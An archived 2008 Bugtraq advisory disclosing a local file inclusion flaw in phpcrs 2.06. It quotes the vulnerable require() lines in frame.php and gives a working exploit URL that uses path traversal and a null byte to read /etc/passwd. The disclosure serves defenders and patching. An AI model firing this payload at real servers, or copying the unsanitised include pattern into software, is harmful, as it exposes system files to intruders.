phpcrs <= 2.06 / Local File Inclusion Vulnerability (this is the correct :)

To: bugtraq@xxxxxxxxxxxxxxxxx, bugtraq-owner@xxxxxxxxxxxxxxxxx
Subject: phpcrs <= 2.06 / Local File Inclusion Vulnerability (this is the correct :)
From: Pepelux <pepelux@xxxxxxxxxxxx>
Date: Wed, 22 Oct 2008 23:44:55 +0200
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:sender :to:subject:mime-version:content-type:content-transfer-encoding :content-disposition:x-google-sender-auth; bh=JrzixiVvORG2wYWN9UFQrKtyr2DzUKxobz1hjEegoqo=; b=SvXS0f5njqWb9bWGqiTnmpcIuxyPXipY0Yf7vGbf5uaNGDi12paUrph1N+GgAXzHxf 8AIUy2Mg6g9eeTBPBn3GKqXTDh5PWgYI636U1liTLuBLKnOZKCuDY8T9z58PSwTUGLTG HTa93iTY73tKL71TFNyDFujSK01n7B6ypadlQ=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:sender:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition:x-google-sender-auth; b=xAdToYNQesxFYQrCMHVAtPaWdVi98WLahwrHGyp+miLSrXZVJkbfwp7Fdv00RWaXHs GtmFWWbR1CinfLgH/WiS7zo2Uge/l+5zsKuUcH3ZhNvdYqUasJIYukT6SdESC+7IUvna v0Y5joMxBljASfQXCe06A3pZ7Fp4fPQI/mEoU=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Sender: pepeluxx@xxxxxxxxx

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
phpcrs <= 2.06 / Local File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$ Program: phpcrs
$ Version: <= 2.06
$ File affected: frame.php
$ Download: http://sourceforge.net/projects/phpcrs/


Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org


--Bug --

151.    elseif( isset( $btnStartImport  ) ) {
152.            require("../inc/frmDoImport.inc.php");
153.            require("../inc/". $importFunction .".inc.php");
154.            require("../inc/inc/getFunctions.inc.php");
155.            $importFunction();
156.            frmDoImport( $selectedImport );
157.    }


-- Exploit --

http://site.com/frame.php?btnStartImport=xxx&importFunction=../../../../../etc/passwd%00

NOTE: website only works with Firefox. To navigate you must use
Firefox and to exploit
it, you only have to change the user-agent.

Prev by Date: [SECURITY] [DSA 1658-1] New dbus packages fix denial of service
Next by Date: vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
Previous by thread: [SECURITY] [DSA 1658-1] New dbus packages fix denial of service
Next by thread: vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
Index(es):
- Date
- Thread